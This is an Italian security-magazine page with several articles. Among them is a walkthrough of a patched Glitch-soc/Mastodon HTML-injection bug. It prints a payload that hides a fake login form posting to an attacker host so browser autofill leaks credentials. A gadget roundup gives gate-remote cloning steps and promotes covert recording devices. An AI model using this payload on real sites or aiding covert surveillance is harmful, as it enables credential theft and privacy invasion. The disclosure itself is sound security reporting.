Articoli
Speciale: Intervista a Fabio Panada consulente sicurezza Cisco

Solitamente, quando i media generalisti parlano di hacker, si concentrano sui criminali informatici, su chi crea e diffonde ransomware o riesce con successo a superare le difese di grandi aziende e istituti finanziari. Non dobbiamo, però, dimenticare che molti hacker lavorano dall’altro lato della barricata, occupandosi di limitare i danni causati dai black hat e di rendere un po’ più sicure le nostre vite (digitali e non).
Un esempio ci arriva da Talos Intelligence Group di Cisco, che quotidianamente analizza milioni di minacce per capire cosa succede nel cyberspazio, tentando di prevenire quelle più gravi.
Abbiamo avuto modo di fare una chiacchierata con Fabio Panada, consulente di sicurezza di Cisco, che ci ha raccontato cosa vede dal suo lato della barricata.
LEGGI L’ INTERVISTA COMPLETA SUL NUMERO 236
In edicola o digitale!
Articoli
Insicuri su quattro ruote
Con tremila chip di almeno 40 tipi diversi, le nuove auto sono sistemi digitali con una superficie di attacco enorme. E ovviamente c’è già chi se ne sta approfittando!

Le automobili sono vulnerabili a un cyberattacco da remoto? La risposta è sì, sempre più spesso. E non solo le auto elettriche che si presume siano dotate di sistemi informatici avanzati. Anche una moderna berlina, persino un’utilitaria può essere hackerata. Questo dipende dal fatto che ormai da più di venti anni i sistemi critici di un’automobile sono gestiti con dei microchip. Secondo una indagine del New York Times in una berlina ci sono circa tremila chip di 40 tipi diversi, dai microcontroller (tipo Arduino) a veri e propri processori. È una delle ragioni per cui durante la pandemia le case automobilistiche hanno avuto difficoltà con la produzione di veicoli: la scarsità dei processori made in China ha impattato soprattutto loro. Dal punto di vista di chi vuole hackerare un’auto, però, questa è una vera e propria fortuna.
Le marche più colpite
I diversi tipi di microcontroller e relativi firmware o sistemi più complessi offrono una montagna di opportunità per chi voglia sperimentare con tecniche inedite e capire come funzionino. Dopo un rapido studio la parte più facile da capire è che i chip utilizzati nel settore non vengono particolarmente curati dal punto di vista della prevenzione. Sono state identificate da un gruppo di hacker etici americani varie vulnerabilità di Ferrari, Bmw, Rolls Royce e Porsche. Ma i marchi sono molti di più, anche perché spesso le componenti sono riutilizzate da brand diversi. In particolare, spiega il ricercatore di cybersicurezza Sam Curry, è possibile accendere da remoto a vari modelli di Kia, Honda, Infiniti, Nissan e Acura. Oppure si possono controllare varie funzionalità delle Mercedes, delle Hyundai e delle Genesis.

Le auto di Elon Musk non hanno chiavi meccaniche o fili dell’accensione da mandare in corto per avviare il mezzo. Per aprirle, secondo il consulente per la sicurezza Sultan Qasim Khan, di Ncc Group, basta intercettare la comunicazione Bluetooth.
Sfondare i portali?
Non ci sono solo le vulnerabilità delle auto ma anche quelle dei sistemi gestionali delle aziende che le producono. Si possono anche, secondo altre fonti, violare i siti di BMW, Rolls Royce, Ferrari e Spireon prendendo il controllo degli account degli acquirenti di queste automobili, ricavare numero di telaio e di serie dei modelli comprati, creare account aziendali fasulli e fare modifiche, creare liste di accesso e modificare per esempio l’indicazione di chi ha comprato un particolare modello o pezzo di ricambio. Secondo Curry, anche Ford, Reviver, Porsche, Toyota, Jaguar e Land Rover hanno problematiche simili, che permettono se non altro di rivelare i nomi, gli indirizzi, la mail e il telefono dei clienti che hanno acquistato i veicoli negli ultimi anni.
Insicurezza di massa
L’automobile è uno dei sistemi di trasporto più utilizzato e diffuso al mondo. Si può accedere facilmente ai sistemi perché non cambiano dopo essere stati messi in commercio. Sono basati su versioni che non vengono mai patchate di Android per il sistema di infotainment o anche del VOS, il Vehicle Operating System che controlla il motore, la trasmissione e altre funzioni di guida dell’automobile. Con il passare del tempo le vulnerabilità vengono scoperte ma le auto, che hanno cicli di vita di dieci e più anni, non prevedono neanche la possibilità di aggiornamenti.
Entrare senza problemi
Il primo punto di insicurezza è l’apertura dell’auto quando questa avviene senza chiavi. In Germania su 237 modelli di auto che si aprono keyless, 230 possono essere aperti con un attacco di tipo relay, cioè registrando e ripetendo il segnale codificato. Ma ci sono anche gli attacchi che permettono di sfruttare le vulnerabilità dei sistemi interni e di controllare tutto: dal sistema di intrattenimento all’accensione sino all’impianto di climatizzazione. Questo dell’insicurezza delle auto moderne è uno dei problemi più grandi che, nei prossimi anni, peggiorerà sempre di più man mano che gli attuali, nuovi modelli, invecchieranno senza patch.

La nuova leva delle automobili che utilizzano sistemi operativi di guida autonoma usano DriveWorks, sviluppato da Nvidia, che fornisce anche l’hardware. Red Hat ha sviluppato il suo IVOS, In-Vehicle Operating System basato su Rhel, Red Hat Enteprise Linux. Google, Microsoft e Apple collaborano per creare una piattaforma comune di guida autonoma chiamata Mentor Nucleus OS.
Leggi anche: auto elettriche con il bug
Articoli
Una falla non Mastodon-tica
Una piccola falla nel filtro HTML di una istanza Mastodon permette l’iniezione di un form nascosto in un post, con cui rubare le credenziali degli utenti che lo visualizzano

Da quando Elon Musk ha acquistato il controllo di Twitter, e ha preso alcune decisioni molto controverse, questo social network ha visto una emorraggia di utenti, che si sono rifugiati su Mastodon. In effetti, Mastodon viene visto un po’ come una versione libera e open source a Twitter, nel senso che mantiene funzionalità simili. Se considerare Diaspora una alternativa FOSS a Facebook è improprio, perché la logica di base e le funzionalità sono differenti, si può dire che Mastodon sia davvero pensato con la stessa logica di interazioni sociali esistenti su Twitter. La sua natura open source, però, offre una serie importanti vantaggi, non ultima la possibilità di personalizzare la propria istanza. Questa “medaglia” ha, chiaramente, un rovescio: è possibile che il server che si sta utilizzando usi una versione di Mastodon differente da quella “ufficiale”, che può quindi nascondere falle e vulnerabilità sconosciute.

Un post malevolo, che riproduce la toolbar dei post di Mastodon e include il form nascosto (FONTE: https://portswigger.net)
Una federazione di server
Uno dei server Mastodon molto utilizzati da chi si occupa di informatica in generale, e di sicurezza informatica nello specifico, è infosec.exchange. Una caratteristica interessante di questo server è che offre la possibilità, nelle impostazioni utente, di abilitare i post in html. Questo significa che l’eventuale contenuto HTML di un post viene caricato nella pagina, interpretato dal browser, e visualizzato. Questo è un potenziale problema in termini di sicurezza perché implica che a un utente è permesso aggiungere componenti al DOM della pagina, e non dobbiamo dimenticare che poi sono i browser degli altri utenti a visualizzarlo, eseguendo tutto ciò che è previsto dall’HTML. Ma, chiaramente, non tutto l’HTML viene per nuocere: è un linguaggio di markup, si occupa più che altro di paragrafi, pulsanti, link e intestazioni. In linea di massima si potrebbe dire che finché si aggiungono elementi grafici sulla pagina non è un problema immediato. Il componente più pericoloso è l’elemento <script></script>, che infatti non è permesso. Il server Mastodon in questione ha infatti un filtro che elimina eventuali porzioni di Javascript inserite nei post. Tutto bene, quindi? Purtroppo no, perché Javascript non è l’unico modo per ottenere una esecuzione remota di codice direttamente nei pc degli utenti, pur essendo il più ovvio. Un metodo meno ovvio, ma spesso sufficientemente efficace, consiste nel farlo fare all’utente, nascondendo pulsanti e anche interi form in una pagina.
Il filtro per l’html, naturalmente, impedirebbe di inserire un form dentro un post Mastodon. Tuttavia, i post possono contenere degli attributi, e gli analisti hanno scoperto che il tag dedicato al titolo del post viene mantenuto così com’è. Infatti, questo codice:
<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>
Viene poi renderizzato nella pagina in questo modo, completamente intatto:
<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>
Come si può intuire, non è possibile usarlo per iniettare Javascript, ma si può usare per iniettare dell’html. Il “problema” è che il codice sarebbe all’interno del titolo, e non ha molto senso. Per poter iniettare qualcosa di realmente pericoloso, bisogna trovare un modo per uscire dal tag. Serve qualcosa che venga sostituito automaticamente, e che possa quindi sfuggire al filtro sull’html.
Per esempio, la scorciatoia
:verified:
Inserisce in un messaggio, titolo incluso, l’icona con la spunta blu tipica di un post “verificato”. Che si riduce a questo html:
<img draggable=”false” class=”emojione custom-emoji” alt=”:verified:” […] >
Facendo un tentativo, si nota che il codice apparentemente inutile
<abbr title=”<a href=’https://blah’>:verified:</a><iframe src=//garethheyes.co.uk/>”>
Diventa:
<abbr title=”<a href=’https://blah</a>’>
<img draggable=” false” … >
<iframe src=//garethheyes.co.uk/>
Quello che è successo è che il server ha inserito il tag img ma, così facendo, ha chiuso il tag precedente, rendendo quindi completamente autonomo il tag con l’iframe che altrimenti sarebbe apparso come testo. L’iframe viene quindi caricato, ed è teoricamente possibile integrare nella pagina porzioni di un altro sito web.
Non è comunque possibile integrare nella pagina altre risorse, come fogli di stile o script: i responsabili del server Mastodon hanno ovviamente previsto che qualcuno potesse cercare di integrare porzioni di pagine presenti su altri server, e hanno impedito questa cosa implementando delle Content Security Policies particolarmente stringenti. Non è infatti possibile fare riferimento a nessuna risorsa esterna al dominio infosec.exchange. Un form, però, può tranquillamente puntare a un’altro sito web. Si può quindi iniziare a scrivere un codice di questo tipo:
<abbr title=”<a href=’https://blah’>:verified:</a></abbr>
<form action=//pirata.it/rubapassword>
<input name=username >
<input type=password name=password >
Questo codice produrrebbe un classico form di login. Qual è il vantaggio, per un malintenzionato? Che i browser moderni, Google Chrome in particolare, hanno la funzione autofill attiva e riempiono automaticamente i campi, inserendo quindi nome utente e password dell’utente che sta visualizzando il post. Non avendo a disposizione javascript non si può attivare un invio automatico del form, però è possibile inserire un pulsante. Basta trovare un modo per camuffarlo e convincere l’utente stesso a cliccarci sopra. Una opzione consiste nel riprodurre la toolbar che appare sotto ad ogni post:
<div class=’status__action-bar’><button type=submit aria-label=’Reply’ title=’Reply’ class=’status__action-bar-button icon-button’ tabindex=’0′>
<i role=’img’ class=’fa fa-reply fa-fw’ aria-hidden=’true’></i>
</button>
<button type=submit aria-label=’Boost’ aria-pressed=’false’ title=’Boost’ class=’status__action-bar-button icon-button’ tabindex=’0′ ><i role=’img’ class=’fa fa-retweet fa-fw’ aria-hidden=’true’></i>
</button><button type=submit aria-label=’Favourite’ aria-pressed=’false’ title=’Favourite’ class=’status__action-bar-button star-icon icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-star fa-fw’ aria-hidden=’true’></i>
</button><button type=submit aria-label=’Bookmark’ aria-pressed=’false’ title=’Bookmark’ class=’status__action-bar-button bookmark-icon icon-button’ tabindex=’0′>
<i role=’img’ class=’fa fa-bookmark fa-fw’ aria-hidden=’true’></i> </button>
<div class=’status__action-bar-dropdown’><button type=submit aria-label=’Menu’ title=’Menu’ class=’icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-ellipsis-h fa-fw’ aria-hidden=’true’></i> </button></div>
</div>
“>
Nella action bar ci sono 5 pulsanti: Reply, Boost, Favourite, Bookmark, e Menu. Per riprodurli basta copiare il codice html dei veri pulsanti, tanto il loro aspetto dipende dai CSS che sono comunque già caricati nella pagina. Essendo perfettamente simile alla vera barra del post, è plausibile che più di qualche utente possa cliccarci sopra per sbaglio. L’unico passaggio che manca è nascondere i campi del form, altrimenti l’utente si rende perfettamente conto dell’inganno. Non si possono trasformare i campi in “hidden”, perché l’autofill dei browser non funzionerebbe. Però, almeno Chrome, funziona perfettamente se i campi non sono visibili a causa dello stile impostato nei CSS. La soluzione, per un malintenzionato, quindi, consiste nel cercare una classe, nei fogli di stile caricati naturalmente da Mastodon, che renda l’oggetto invisibile. Per esempio, la classe react-toggle-track-check ha l’opacità impostata a zero. Assegnando questa classe agli elementi input:
<input name=username class=react-toggle-track-check>
<input type=password name=password class=react-toggle-track-check>
Rimangono nella pagina pur essendo invisibili per l’utente, e vengono riempiti dall’autofill con i dati dell’utente. Quando l’utente clicca su uno dei pulsanti il form viene inviato al sito del malintenzionato, che quindi riceve le credenziali della vittima.

Cliccando su un pulsante il form viene inviato al server del malintenzionato, che quindi riceve in chiaro username e password della vittima (FONTE: https://portswigger.net)
Entità della vulnerabilità
Questa vulnerabilità è dovuta a una modifica presente sul server di infosec.exchange, quindi gli altri server Mastodon non sono necessariamente vulnerabili. E gli utenti di questo server sono in buona parte esperti di sicurezza, quindi è meno probabile che possano cadere nel phishing. È però anche vero che questo tipo di attacco potrebbe, teoricamente, essere applicato a altri server che contengano una modifica simile. Dipende infatti da alcune funzioni relative al supporto a markdown e html nei post presenti in Glitch-soc, un fork di Mastodon su cui si basa il server di infosec.exchange ma che altri potrebbero avere implementato sui propri server. Il problema, per un utente, è che non è facile capire se il server abbia questa vulnerabilità, e con l’improvviso aumento di utenti (e server) è facile che qualcuno finisca su un server che non è correttamente patchato.
La soluzione
I responsabili di Glitch-soc hanno corretto immediatamente il problema dopo la segnalazione, e i server di infosec.exchange sono ormai sicuri. La versione originale di Mastodon, invece, non è mai stata in pericolo, perché non supporta gli attributi title per i post. Più in generale, però, questo tipo di attacchi non potrebbe funzionare senza browser web che eseguono l’autofill su form che l’utente non riesce nemmeno a vedere. Purtroppo, non esistono estensioni per Google Chrome che disabilitino l’autocomplete temporaneamente, in modo da farlo funzionare solo quando l’utente lo desidera davvero. Su Firefox, invece, è necessario che l’utente porti almeno il focus sul form, prima che il browser cerchi di riempire i campi con le credenziali memorizzate.
Articoli
Un provider Internet italiano e di gran qualità

Nella scelta di un provider Internet molto spesso si guarda come prima, e quasi unica, cosa al costo della connessione. Peccato che, non appena si verifica un problema, non tutti i provider, anche quelli molto noti, riescano a rimediare velocemente. Eppure esistono realtà italiane, decisamente più vicine alle necessità del cliente e in grado di fornire connessioni stabili e veloci, come Ehiweb.
Un supporto di qualità
Creata dall’azienda bolognese Ehinet nel 2004 (che nasce nello stesso anno), il brand Ehiweb è cresciuto negli anni in maniera costante e organica, aumentando la qualità e la quantità dei servizi ma con un punto fermo che è rimasto invariato: la cura nell’assistenza al cliente, o customer care per usare il termine inglese. In qualunque fase, dal primo contatto alla fase di attivazione o durante la risoluzione di un problema, l’assistenza clienti di Ehiweb si dimostra cordiale, veloce e competente. E non sono “parole”: chiunque può verificare di persona controllando, per esempio, l’opinione dei clienti su Trustpilot.
A questo possiamo aggiungere un aspetto fondamentale, che poche altre realtà riescono a offrire: la personalizzazione. Ogni cliente ha un referente personale a cui rivolgersi in caso di necessità o anche solo per conoscere le caratteristiche dei nuovi servizi. Insomma, con Ehiweb non esiste il classico “muro di gomma” che costringe l’utente a telefonare o contattare “n” volte l’operatore prima di ricevere il supporto richiesto, sentendosi comunque come “un numero” rimbalzato tra un operatore e un altro e con risposte che arrivano da call center sparsi per il mondo.
Etica al primo posto
Un altro punto di forza che caratterizza Ehiweb fin dall’inizio, e di cui godono sia gli utenti, sia gli impiegati dell’azienda stessa, e anche i fornitori che collaborano con il provider bolognese, è la lealtà e l’onesta. Questa idea di comportamento corretto si riverbera su vari elementi, oltre all’assistenza di cui abbiamo già scritto:
- i costi per gli utenti, che sono sempre trasparenti e chiari, assolutamente privi di voci nascoste. Per fare un esempio, Ehiweb propone solo due tipi di promozioni – a sei mesi o per sempre – senza creare confusione in chi cerca un nuovo operatore e, soprattutto, rendendo chiaro il vantaggio economico nel tempo dell’offerta proposta.
- libertà di scelta per i clienti. Il contratto con Ehiweb non ha vincoli di durata minima. Questo è uno dei motivi per cui spesso le persone hanno paura di cambiare provider. Inoltre, Ehiweb sposa a pieno la necessità del modem libero. Da sempre, infatti, sostiene la necessità di lasciare liberi i clienti di scegliere il loro modem, offrendo comunque di base dei dispositivi FRITZ!Box che sono di sicuro tra i migliori sul mercato.
- il rapporto con i dipendenti. Oltre alle pratiche trasparenti verso i clienti, anche il rapporto etico con chi lavora in Ehiweb è un fattore radicato nell’azienda fin dal primo giorno. Questo ha contribuito a creare un ambiente di lavoro positivo e stimolante con spazi confortevoli in azienda, sia per quel che riguarda le postazioni operative sia per i momenti di relax durante e dopo il lavoro. Altri vantaggi per gli impiegati sono la preferenza di contratti a tempo indeterminato, l’assicurazione sanitaria aggiuntiva a quella prevista per legge, i buoni pasto e vari bonus, premi e incentivi.
ADSL, fibra, VoIP e anche mobile
L’offerta di connettività di Ehiweb copre ogni esigenza. Per quel che riguarda le connessioni cablate, si va dall’ADSL fino a 20 Mega, per chi è raggiunto solo dal doppino in rame, alle connessioni FTTC (miste rame-fibra) a 100 e 200 Mega. Sul sito di Ehiweb troviamo anche le connessioni FTTH a 1 Giga o a 2,5 Giga, attivabili anche sulla rete Open Fiber nelle località raggiunte. Sempre dal punto di vista della connettività, l’offerta aggiunta più di recente è quella relativa alle SIM per smartphone e tablet. Ehiweb Mobile è la nuova soluzione pensata per i privati, per il business e anche per l’IoT. Ehiweb si occupa di tutto anche nel caso di passaggio da un altro operatore, con prezzi davvero interessanti. Sono poi da citare anche i servizi Web: Ehiweb si occupa anche di gestione e registrazione domini, servizi di hosting e server virtuali su sistema operativo Linux che assicurano grandi prestazioni e uptime oltre il 99,95%. Infine, a completare l’offerta a 360 gradi, troviamo servizi VoIP, SMS e fax virtuale.
Articoli
Metti al sicuro la tua email
Cinque strumenti gratuiti da utilizzare per proteggere la vostra identità, la vostra privacy e i vostri sistemi di posta elettronica da spammer e spioni

Ci sono molti motivi per cui è importante nascondere il proprio indirizzo email da varie applicazioni e servizi Web di terze parti e anche proteggere la posta elettronica. Può capitare di creare account gratuiti con qualche servizio Web apparentemente interessante o di iscriversi a newsletter. È una pratica comune, ed è quello che fa la maggior parte delle persone. Se però si verificasse una violazione del database del servizio Web o della newsletter, il vostro indirizzo email potrebbe essere esposto a ogni tipo di truffatore e spammer. Database di indirizzi di questo tipo vengono costantemente venduti sul Dark Web da pirati informatici. In alcuni casi, inoltre, i siti raccolgono anche gli indirizzi email per inviare messaggi di spam. Alcuni utenti hanno indirizzi email dedicati a questo tipo di posta elettronica casuale, non di lavoro e non importante. Ma ci sono modi migliori per prevenire la spam: si possono utilizzare strumenti specializzati che forniscono indirizzi di posta elettronica fittizi da condividere con terzi. I messaggi inviati a essi vengono inoltrati al vostro indirizzo email reale, che non viene esposto a nessuno (se non allo strumento che state utilizzando). Volete smettere di ricevere email da determinate fonti? Potete bloccarle ancora prima che raggiungano la vostra casella di posta. Qui di seguito vedremo alcuni dei più interessanti strumenti Open Source che forniscono alias di posta elettronica per aiutarvi a nascondere il vostro vero indirizzo email oltre a un progetto di più ampio respiro per la protezione della privacy e della sicurezza della posta elettronica.
Il servizio di SimpleLogin
SimpleLogin è una soluzione Open Source che permette di generare alias di posta elettronica gratuitamente. Il servizio, la cui startup è stata acquisita lo scorso aprile da Proton (vedi oltre), ha anche implementato dei filtri anti-spam che rilevano automaticamente gli indirizzi e i contenuti dei messaggi di questo tipo e bloccano l’email forwarding per mantenere pulita la vostra casella di posta. Il piano gratuito vi consente di creare 10 alias (larghezza di banda illimitata) e di avere una casella di posta elettronica. Quindi se desiderate un numero illimitato di alias e la possibilità di aggiungere altri indirizzi email per la protezione, potete optare per il suo piano Premium che costa 30 dollari all’anno se pagate in una soluzione unica o 4 al mese fatturati mensilmente. È possibile accedere al servizio tramite il Web, un’estensione del browser (Chrome, Firefox e Safari) e applicazioni mobili (Android e iOS). Inoltre, potete fare self-hosting per avere il controllo totale degli alias di posta elettronica e avere la possibilità di personalizzare la vostra esperienza con il servizio.
Firefox Relay di Mozilla
Firefox Relay è un servizio gratuito con opzioni a pagamento diverse in base al Paese. Se si sceglie di usarlo è meglio abbinarlo a Firefox come browser Web per ottenere una perfetta integrazione ma è possibile utilizzarlo anche su browser basati su Chromium come Brave e Vivaldi. Avrete a disposizione gratuitamente cinque alias di posta elettronica. Otterrete inoltre l’estensione del browser per utilizzare Relay su qualsiasi sito e la rimozione degli elementi traccianti dalle email. Se si desidera avere un paio di alias di posta elettronica e che vengano reindirizzati alla propria casella, risulta una buona opzione. Si noti che non è disponibile alcuna app per dispositivi mobili quindi si può accedere al servizio solo utilizzando il browser mobile o l’estensione per il browser desktop. Per 0,99 € al mese con fatturazione annuale o 1,99 € pagando mensilmente, ottenete anche blocco delle email pubblicitarie e la possibilità di rispondere ai messaggi in modo anonimo. C’è anche un dominio Relay per creare alias di posta elettronica ovunque vi troviate, per esempio impostando un indirizzo come [email protected] quando siete fuori a cena. Negli USA e in Canada al servizio potete aggiungere la possibilità di creare alias per i numeri di telefono ma per ora questa opzione non è disponibile in Italia.
Le opzioni di AnonAddy
AnonAddy è una soluzione simile a SimpleLogin in termini di funzionalità di base disponibili. I piani tariffari potrebbero aiutarvi a scegliere uno dei due, considerando che AnonAddy gratuitamente fornisce alias standard illimitati con una larghezza di banda mensile di 10 MB. È anche possibile fare il self-hosting del servizio per una maggiore privacy. Consente inoltre di inserire le proprie chiavi pubbliche GPG/OpenPGP e di aggiungerle per ogni destinatario. Potete poi attivare o disattivare la crittografia. Quando è attiva, tutti i messaggi inoltrati vengono cifrati con la vostra chiave pubblica e solo voi sarete in grado di decifrarli con la chiave privata corrispondente. È inoltre possibile nascondere e crittografare l’oggetto dell’email, il che può essere utile se si utilizza Gmail o Outlook e si desidera evitare che la casella di posta possa essere spiata. AnonAddy offre anche estensioni del browser per Chrome e Firefox e client per l’utilizzo su dispositivi mobili (Android e iOS). Infine permette di gestire alias, destinatari, domini e nomi utente aggiuntivi utilizzando l’API AnonAddy.
DuckDuckGo Email Protection
Se utilizzate il browser DuckDuckGo potete approfittare del suo servizio di protezione delle email che vi permette di ottenere un alias di posta elettronica ([email protected]) da utilizzare per nascondere il vostro vero indirizzo. Ottenere la propria email @duck.com per proteggere la privacy è facile. Andate su questo sito, scegliete il vostro indirizzo unico e inserite l’email a cui volete che siano inoltrati i messaggi che vi arriveranno, dopo che saranno stati rimossi più tracker possibili. Email Protection è supportato dalle app DuckDuckGo per Android, Mac (beta) e iOS, nonché dalle estensioni di DuckDuckGo per Firefox, Chrome, Brave ed Edge. Sia le app sia le estensioni del browser rilevano automaticamente i campi per inserire il recapito di posta elettronica e consentono di riempire facilmente i moduli con il proprio indirizzo personale @duck.com o con uno privato del servizio generato in modo casuale, da utilizzare quando si pensa che un sito possa inviare spam o condividere le informazioni degli utenti.
ProtonMail e colleghi
Un approccio diverso, ma interessante per il suo ampio respiro, al tema della protezione della posta è quello adottato da ProtonMail. Si tratta di un servizio di posta elettronica privata che si serve della crittografia end-to-end Open Source e della crittografia ad accesso zero per proteggere la posta da ogni genere di violazione. Offre funzioni anti-tracking bloccando automaticamente i pixel di tracciamento e nascondendo il vostro indirizzo IP e permette di creare più indirizzi collegati allo stesso account. Utilizza anche PhishGuard per offrire una tutela dal phishing segnalando email potenzialmente falsificate nella posta in arrivo, ma il suo principale punto di forza è la crittazione dei messaggi e dei contatti. Al servizio si accede attraverso app Web, per Android e per iOS ed è anche disponibile Proton Mail Bridge per aggiungere la crittografia end-to-end ad applicazioni come Outlook e Thunderbird. La versione gratuita del servizio offre la cifratura della posta elettronica, un indirizzo email gratuito e fino a 150 messaggi al giorno cifrati, oltre ad altri servizi del pacchetto Proton. ProtonMail non è infatti più un prodotto singolo ma fa parte di un ecosistema per la tutela dei dati dell’utente che, nelle parole del produttore, “è garantita da crittografia avanzata, codice Open Source e leggi svizzere sulla privacy”. Ci sono poi le versioni a pagamento con più indirizzi email e domini personalizzati.
Articoli
I gadget preferiti degli hacker
La valigetta del pirata contiene dispositivi hi-tech piccoli, anonimi e potenti, facilmente acquistabili anche su Amazon

Con il termine hacker viene spesso indicato un esperto di informatica, di programmazione e di sicurezza in grado di intrufolarsi illegalmente nelle reti di computer altrui. In realtà occorre classificare gli hacker in (almeno) due categorie. Esistono gli hacker buoni, i cosiddetti white hat, che aiutano le aziende a rimuovere virus o verificare reti alla ricerca di vulnerabilità, e quelli cattivi, black hat, che sfruttano le loro conoscenze a fini tutt’altro che etici (rubare dati personali, foto o video compromettenti per rivenderle al miglior offerente, svuotare conti correnti altrui e in genere arricchirsi con azioni non proprio legali).
Gadget dalle mille potenzialità
Per scoprire le vulnerabilità nei sistemi di comunicazione e raggiungere, così, i propri scopi sia gli hacker buoni che quelli cattivi hanno ovviamente bisogno di software specifici, ma non solo: esistono numerosi gadget e accessori che possono essere utilizzati o assieme a un computer o in modalità “stand alone” (non serve un PC per farli funzionare). In queste pagine analizzeremo dunque alcuni dispositivi che non mancano mai nella dotazione del perfetto hacker. Si va dalla chiavetta USB in grado di catturare l’audio ambientale al telecomando che intercetta qualsiasi segnale inviato a un dispositivo elettronico. Osservateli prestando molta attenzione e la prossima volta che tornate in ufficio, prima di digitare la password del vostro account o prima di accedere al vostro home banking, controllate che non ci siano strani accessori collegati al computer… e nel dubbio, desistete!
CLONA TELECOMANDO
Grazie a questo piccolo oggetto, l’hacker potrà clonare il telecomando (o i telecomandi) dei cancelli automatici semplicemente avvicinandoli tra loro. Il dispositivo può memorizzare fino a quattro impulsi diversi. Il suo funzionamento è abbastanza semplice come illustrato di seguito.
Quanto costa: 10,00 € (3 pezzi)
Sito Internet: http://bit.ly/clonetelecomando
1 Prima di usare il dispositivo, l’hacker resetta il “clonatore” tenendo premuti i pulsanti A e B contemporaneamente fino a quando il LED non lampeggia per tre volte. Rilascia il pulsante B per poi premerlo per altre tre volte: lampeggerà ancora il LED. A quel punto rilascia anche il pulsante A. Se il reset è andato buon fine, alla pressione de i vari pulsanti, il LED posto sul telecomando non si accenderà.
2 L’hacker adesso avvicina il telecomando da clonare e tiene premuto il pulsante contemporaneamente a quello del telecomando clonato. Attende che il LED lampeggi per tre volte e poi rilascia i pulsanti di entrambi i telecomandi per completare la “clonazione”.
MICROSPIA AUDIO
Un aspetto importante dell’attività dei pirati è il cosiddetto social hacking. Ascoltare ciò che la vittima dice è un’ottima idea se si intendono carpire informazioni importanti per scoprire le sue password. Il Lightrec-mini è una chiavetta USB con una particolarità: contiene una cimice in grado di registrare fino a 140 ore di conversazione, attivandosi automaticamente quando le persone parlano. Ovviamente funziona anche come normale chiavetta USB.
Quanto costa: 49,95 €
Sito Internet: https://www.short.tips/url/lr-mini
REMOTE CONTROL
Questo è un vero e proprio telecomando da hacker che intercetta qualsiasi segnale inviato a un dispositivo elettronico che sia un condizionatore, un televisore e persino l’antifurto dell’automobile. Una volta memorizzati i codici si potranno controllare i dispositivi intercettati direttamente dallo smartphone. Il suo funzionamento è molto semplice. L’hacker per prima cosa installa l’apposita app mobile e al termine l’avvia per rilevare automaticamente sia la rete che il remote control. A questo punto, procede con la configurazione del telecomando e inizia ad aggiungere i vari dispositivi individuati.
Quanto costa: 48,00 €
Sito Internet: https://www.short.tips/url/blrm-4
DISK ERASER
Può capitare che un hacker si senta braccato dalle forze dell’ordine e decida di eliminare tutte le prove contenute sui propri hard disk. In questi casi ricorre a un gadget come il Wiebetech Drive Erazer. Si tratta di un dispositivo in grado di cancellare in modo sicuro sia dischi Serial ATA che Parallel ATA senza la necessità di collegarli a un computer.
Quanto costa: 276,00 €
Sito Internet: http://bit.ly/hackdriveerazer
MICRO REGISTRATORE SPIA
Dalle dimensioni contenute (12.4 x 11.1 x 5.6cm) e dal peso irrisorio (194g), è una microspia con scheda GSM: basta chiamare per ascoltare ciò che accade attorno. Il dispositivo richiama al rilevamento di un rumore e trasmette suoni chiari in un raggio di circa 15 metri. Registra con un’autonomia di 72ore. Include il GPS.
Quanto costa: 229,00 €
Sito Internet: www.short.tips/url/gsmspy2
TI SPIO DALLO SMARTWATCH
Questo gadget nasconde una serie di pulsanti e una fotocamera HD con una risoluzione di 1080P e un registratore di alta qualità. Ha le funzionalità classiche degli orologi smart, come il contapassi e il contatore calorie. Si collega via Bluetooth 4.0 BLE su iOS e Android.
Quanto costa: 149,00 €
Sito Internet: www.short.tips/url/watchspy2
BASTA CHIAMARE E REGISTRA
Questa piccola scatoletta nasconde un sofisticato registratore audio con scheda GSM. Il dispositivo viene attivato semplicemente chiamando il numero della scheda.
Quanto costa: 25,00 €
Sito Internet: https://www.short.tips/url/gsmspy1
MOSTRA ANCHE L’ORA
Sembra un braccialetto fitness, ma nasconde un registrare video e audio. Include una scheda SD da 32GB. Il dispositivo dispone di una funzione di registrazione in loop che sovrascrive i video più vecchi non appena lo spazio su scheda si esaurisce.
Quanto costa: 46,00 €
Sito Internet: https://www.short.tips/url/watchspy1
IDEALE PER PROTEGGERE I GADGET
Pronti a realizzare la nostra cassetta degli attrezzi? Sì? Bene, allora il primo passo è acquistare una vera e propria custodia per gli strumenti presentati in queste pagine. Qualcosa che sia rigido, sicuro e facilmente trasportabile. Una soluzione potrebbe essere KESSER che, nata per macchine fotografie e obiettivi, si adatterebbe perfettamente al nostro scopo. È compatta, piena di schiuma protettiva, impermeabile ed ermetica. E costa solo 45,00 euro.
Quanto costa: 45,00 €
Sito Internet: https://www.short.tips/url/valigiafotocamera
Articoli
A cosa servono i router e gli switch e quali sono le differenze

Nella rete di computer, ci sono diversi dispositivi che consentono ai dati di essere trasmessi da un punto all’altro. Due di questi dispositivi sono switch e router. Mentre entrambi i dispositivi sono utilizzati per connettere diversi dispositivi di rete, hanno scopi diversi e sono utilizzati in contesti diversi.
Per acquistare router, switch e altri apparati per migliorare la tua sicurezza ti consigliamo di comprare su ollo shop, un e-commerce specializzata nel mondo dell’elettronica che offre prodotti di ottima qualità a prezzi molto vantaggiosi.
Nelle prossime righe andremo a vedere più nello specifico cosa sono i router e gli switch e quali sono le principali differenze tra loro.
Che cos’è uno Switch
Uno switch è un dispositivo di rete che connette diversi dispositivi sulla stessa rete locale (LAN) e consente la comunicazione tra di loro. Questo dispositivo è progettato per gestire una grande quantità di traffico dati sulla rete LAN, in modo che i dispositivi sulla stessa rete possano comunicare tra loro in modo efficiente e veloce.
Uno switch funziona inviando dati attraverso la rete LAN a destinazioni specifiche, in base all’indirizzo MAC (Media Access Control) del dispositivo di destinazione. L’indirizzo MAC è un identificatore univoco assegnato a ogni dispositivo di rete. Quando i dati vengono inviati attraverso la rete, lo switch cerca l’indirizzo MAC del dispositivo di destinazione e invia i dati solo a quel dispositivo. Ciò significa che solo il dispositivo di destinazione riceverà i dati, riducendo così la congestione di rete e migliorando le prestazioni.
Uno switch è in grado di gestire il traffico di rete LAN, ma non è in grado di instradare il traffico di rete su diverse reti. In altre parole, uno switch è limitato all’ambito di una singola rete LAN.
Che cos’è un Router
